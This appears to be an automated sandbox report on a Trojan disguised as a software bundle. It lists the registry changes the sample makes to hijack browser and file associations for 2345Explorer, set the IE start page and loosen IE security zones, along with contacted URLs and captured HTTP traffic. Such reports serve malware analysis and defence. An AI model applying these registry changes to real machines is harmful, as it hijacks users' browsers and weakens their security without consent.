[HKCU\Software\Classes\.html]
"(Default)" = "2345ExplorerHTML"

[HKCR\HTTP\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Classes\https\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationName" = "2345王牌浏览器"

[HKCU\Software\Classes\.shtml]
"(Default)" = "2345ExplorerHTML"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "2345Explorer"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe,0"

[HKCU\Software\Classes\http\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "2345Explorer.exe"

[HKCR\2345ExplorerHTML\Shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".xhtml" = "2345ExplorerHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\StartMenu]
"StartMenuInternet" = "2345Explorer.exe"

[HKCU\Software\Classes\.mhtml]
"(Default)" = "2345ExplorerHTML"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\StartMenu]
"StartMenuInternet" = "2345Explorer.exe"

[HKCU\Software\Classes\2345ExplorerHTML\Shell\open\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Classes\https\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\DefaultIcon]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".html" = "2345ExplorerHTML"

[HKCU\Software\Classes\mhtmlfile\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKCU\Software\Classes\2345ExplorerHTML\Shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationDescription" = "2345王牌浏览器"

[HKCU\Software\Classes\http\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\InstallInfo]
"IconsVisible" = "1"

[HKCR\file\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Classes\htmlfile\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm]
"Progid" = "2345ExplorerHTML"

[HKLM\SOFTWARE\RegisteredApplications]
"2345Explorer" = "Software\Clients\StartMenuInternet\2345Explorer.exe\Capabilities"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".mhtml" = "2345ExplorerHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\shell\open\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe]
"(Default)" = "2345王牌浏览器"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe,0"

[HKCR\2345ExplorerHTML\DefaultIcon]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe,1"

[HKCU\Software\Classes\htmlfile\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\2345Explorer.exe]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKCR\https\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\URLAssociations]
"http" = "2345ExplorerHTML"
"ftp" = "2345ExplorerHTML"

[HKCU\Software\Classes\mhtmlfile\shell]
"(Default)" = "2345Explorer"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationName" = "2345王牌浏览器"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht]
"Progid" = "2345ExplorerHTML"

[HKCU\Software\Classes\file\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\shell\open\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "2345ExplorerHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml]
"Progid" = "2345ExplorerHTML"

[HKCU\Software\Classes\2345ExplorerHTML]
"(Default)" = "2345ExplorerHTML"

[HKCU\Software\Classes\ftp\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCR\https\shell]
"(Default)" = "2345Explorer"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\URLAssociations]
"https" = "2345ExplorerHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\InstallInfo]
"IconsVisible" = "1"

[HKCR\2345ExplorerHTML]
"(Default)" = "2345ExplorerHTML"

[HKCR\htmlfile\shell\opennew\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Classes\.htm]
"(Default)" = "2345ExplorerHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".xht" = "2345ExplorerHTML"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD F2 FC C7 B1 1C 70 E8 D2 87 55 8A 45 28 BE AE"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".htm" = "2345ExplorerHTML"

[HKCU\Software\Classes\file\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\DefaultIcon]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe,0"

[HKCR\HTTP\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCR\file\shell]
"(Default)" = "2345Explorer"

[HKCR\htmlfile\shell]
"(Default)" = "2345Explorer"

[HKCR\mhtmlfile\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCU\Software\Classes\.mht]
"(Default)" = "2345ExplorerHTML"

[HKCR\mhtmlfile\shell]
"(Default)" = "2345Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml]
"Progid" = "2345ExplorerHTML"

[HKCU\Software\Classes\2345ExplorerHTML\DefaultIcon]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe,1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\2345Explorer.exe]
"Path" = "%Program Files%\2345Soft\2345Explorer"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".mht" = "2345ExplorerHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html]
"Progid" = "2345ExplorerHTML"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "2345Explorer.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\2345Explorer.exe\Capabilities\FileAssociations]
".shtml" = "2345ExplorerHTML"

[HKCU\Software\Classes\.xht]
"(Default)" = "2345ExplorerHTML"

[HKCR\htmlfile\shell\2345Explorer\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

[HKCR\2345ExplorerHTML\Shell\open\command]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe %1"

The process p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C E2 5B E3 9F 54 B3 B8 F7 52 65 16 72 DC 8D E0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process 2345explorer_k43181459.exe:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe" = "装机必备软件包"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 FE AC A6 C0 BF EB E5 E4 04 F1 E1 C0 78 48 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 2345explorer_k43181459.exe:140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer]
"DisplayName" = "2345王牌浏览器"
"UninstallString" = "%Program Files%\2345Soft\2345Explorer\Uninstall.exe"

[HKLM\SOFTWARE\2345Explorer]
"Value" = "000038043710308050102861200403"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\2345Explorer]
"video_ad_block" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer]
"DisplayIcon" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer]
"DisplayVersion" = "v5.0"
"Publisher" = "2345.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\2345Explorer.exe]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKLM\SOFTWARE\2345Explorer]
"Value4" = "k43181459 1862"
"Value5" = "true"
"Value2" = "1"
"Value3" = "000030458638000782013402"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 04 DD CE EB D8 7C 46 AC 85 18 2F 0B 15 62 AE"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?k43181459"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\2345Explorer.exe]
"Path" = "%Program Files%\2345Soft\2345Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\2345Explorer]
"Path" = "%Program Files%\2345Soft\2345Explorer"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer]
"URLInfoAbout" = "http://ie.2345.com"

[HKCU\Software\2345Explorer\Extensible Cache]
"(Default)" = ""

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????QQ27762772
Product Name: ????????Q?????
Product Version: 1.0.0.0
Legal Copyright: ??????QQ27762772
???Q??sqb.2015cc.cc
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ????????Q?????
Comments: ????????Q?????
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://1111.ip138.com/ic.asp	183.238.101.232
hxxp://www.52zswl.com/gg.asp	103.225.197.92
hxxp://www.qb123456.com/	23.252.164.251
hxxp://www.qb123456.com/?WebShieldDRSessionVerify=IAMEPrbNNhN4I9Ma9Ltt	23.252.164.251
hxxp://32.7host.cn/gundong/index.html
hxxp://4399.ecoma.glb0.lxdns.com/theme/images/5star.gif
hxxp://www.5187789.com/app.js
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=1255320825&show=pic
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1255320825&show=pic&t=z
hxxp://oz.cnzz.com/stat.htm?id=1255320825&r=&lg=en-us&ntime=none&cnzz_eid=902378567-1437411887-&showp=1276x846&t=±í¸ç¹ÙÍø&h=1&rnd=1530544393	198.11.132.200
hxxp://all.cnzz.com.danuoyi.tbcache.com/img/pic.gif
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=879529751	42.120.219.171
hxxp://cnzz.mmstat.com/app.gif?&cna=MRg0DmUdX3ECAcGK9OdBjXql	42.120.219.171
hxxp://s11.cnzz.com/stat.php?id=1255320825&show=pic	1.99.192.16
hxxp://icon.cnzz.com/img/pic.gif	195.27.31.248
hxxp://pcookie.cnzz.com/app.gif?&cna=MRg0DmUdX3ECAcGK9OdBjXql	42.120.219.171
hxxp://memeda528.32.5vv.cc/gundong/index.html
hxxp://c.cnzz.com/core.php?web_id=1255320825&show=pic&t=z	195.27.31.246
hxxp://pic.crsky.com/theme/images/5star.gif	203.130.61.92

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.qb123456.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Safedog/4.0.0

Location: /?WebShieldDRSessionVerify=IAMEPrbNNhN4I9Ma9Ltt

Content-Length: 0

Connection: Close

Content-Type: text/html

GET /9.gif?abc=1&rnd=879529751 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Tengine

Date: Mon, 20 Jul 2015 17:04:49 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=MRg0DmUdX3ECAcGK9OdBjXql; expires=Thu, 17-Jul-25 17:04:49 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=68965e5f; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=44baaabda8fc33a961ea8b9c_1437411889; expires=Thu, 17-Jul-25 17:04:49 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=MRg0DmUdX3ECAcGK9OdBjXql

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
 Tengine..Date: Mon, 20 Jul 2015 17:04:49 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=MRg0DmUdX3
ECAcGK9OdBjXql; expires=Thu, 17-Jul-25 17:04:49 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=68965e5f; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=44baaabda8fc33a961ea8b9c_1437411889; expires=Thu, 
17-Jul-25 17:04:49 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=MRg0DmUdX3ECAcGK9OdBjXql..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..

GET /core.php?web_id=1255320825&show=pic&t=z HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 766

Connection: keep-alive

Date: Mon, 20 Jul 2015 17:04:48 GMT

Last-Modified: Mon, 20 Jul 2015 17:04:48 GMT

Expires: Mon, 20 Jul 2015 17:19:48 GMT

Via: cache7.l2de1[308,200-0,M], cache23.l2de1[309,0], cache1.de1[309,200-0,M], cache5.de1[309,0]

X-Cache: MISS TCP_REFRESH_MISS dirn:3:133377696

X-Swift-SaveTime: Mon, 20 Jul 2015 17:04:48 GMT

X-Swift-CacheTime: 900
!function(){var p,q,r,a=encodeURIComponent,b="1255320825",c="pic",d=""
,e="online_v3.php",f="z13.cnzz.com",g="1",h="pic",i="z",j="站
8271;统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:
",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push(
"h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===
m&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k[
"createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/web
site.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.
cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j
 "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):
p="<a href='" q "' target=_blank title='" j "'>" j "</a>",
k["createIcon"]([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Ty
pe: application/javascript..Content-Length: 766..Connection: keep-aliv
e..Date: Mon, 20 Jul 2015 17:04:48 GMT..Last-Modified: Mon, 20 Jul 201
5 17:04:48 GMT..Expires: Mon, 20 Jul 2015 17:19:48 GMT..Via: cache7.l2
de1[308,200-0,M], cache23.l2de1[309,0], cache1.de1[309,200-0,M], cache
5.de1[309,0]..X-Cache: MISS TCP_REFRESH_MISS dirn:3:133377696..X-Swift
-SaveTime: Mon, 20 Jul 2015 17:04:48 GMT..X-Swift-CacheTime: 900..!fun
ction(){var p,q,r,a=encodeURIComponent,b="1255320825",c="pic",d="",e="
online_v3.php",f="z13.cnzz.com",g="1",h="pic",i="z",j="站长
;统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m=
"0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push(
<<< skipped >>>

GET /stat.htm?id=1255320825&r=&lg=en-us&ntime=none&cnzz_eid=902378567-1437411887-&showp=1276x846&t=±í¸ç¹ÙÍø&h=1&rnd=1530544393 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: oz.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/1.4.6

Date: Mon, 20 Jul 2015 17:04:48 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT

Connection: close

Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..

GET /ic.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: 1111.ip138.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 20 Jul 2015 17:10:42 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 224

Content-Type: text/html

Set-Cookie: ASPSESSIONIDCSSQBCBT=PDIBLGDCJFMLKIJFKCPLCDNJ; path=/

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[193.138.244.231] ................</center></body><
;/html>HTTP/1.1 200 OK..Date: Mon, 20 Jul 2015 17:10:42 GMT..Server
: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 224..Conte
nt-Type: text/html..Set-Cookie: ASPSESSIONIDCSSQBCBT=PDIBLGDCJFMLKIJFK
CPLCDNJ; path=/..Cache-control: private..<html>..<head>..&
lt;meta http-equiv="content-type" content="text/html; charset=gb2312"&
gt;..<title> ....IP.... </title>..</head>..<body 
style="margin:0px"><center>....IP....[193.138.244.231] ......
..........</center></body></html>..

GET /gg.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.52zswl.com

Cache-Control: no-cache

HTTP/1.1 404 Not Found

Date: Mon, 20 Jul 2015 17:04:44 GMT

Content-Length: 1308

Content-Type: text/html

Server: IIS

X-Powered-By: WAF/2.0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>.....
.......</TITLE>..<META HTTP-EQUIV="Content-Type" Content="tex
t/html; charset=GB2312">..<STYLE type="text/css">..  BODY { f
ont: 9pt/12pt .... }..  H1 { font: 12pt/15pt .... }..  H2 { font: 9pt/
12pt .... }..  A:link { color: red }..  A:visited { color: maroon }..&
lt;/STYLE>..</HEAD><BODY><TABLE width=500 border=0 c
ellspacing=10><TR><TD>..<h1>............</h1&g
t;....................................................<hr>..<
p>................</p>..<ul>..<li>...............
.........................................</li>..<li>......
......................................................................
......</li>..<li>....<a href="javascript:history.back(1
)">....</a>....................</li>..</ul>..<
h2>HTTP .... 404 - ..................<br>Internet ........ (I
IS)</h2>..<hr>..<p>..............................<
;/p>..<ul>..<li>.... <a href="hXXp://go.microsoft.co
m/fwlink/?linkid=8180">Microsoft ............</a>..........&l
dquo;HTTP”..“404”........</li>..<li>....
“IIS ....”...... IIS ...... (inetmgr) ....................
....“........”..“............”..“.......
...........”........</li>..</ul>..</TD><
<<< skipped >>>

GET /theme/images/5star.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.qb123456.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pic.crsky.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 20 Jul 2015 08:41:16 GMT

Content-Type: image/gif

Last-Modified: Thu, 26 Mar 2009 08:50:34 GMT

Accept-Ranges: bytes

ETag: "029e5ecefadc91:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 1185

Age: 1

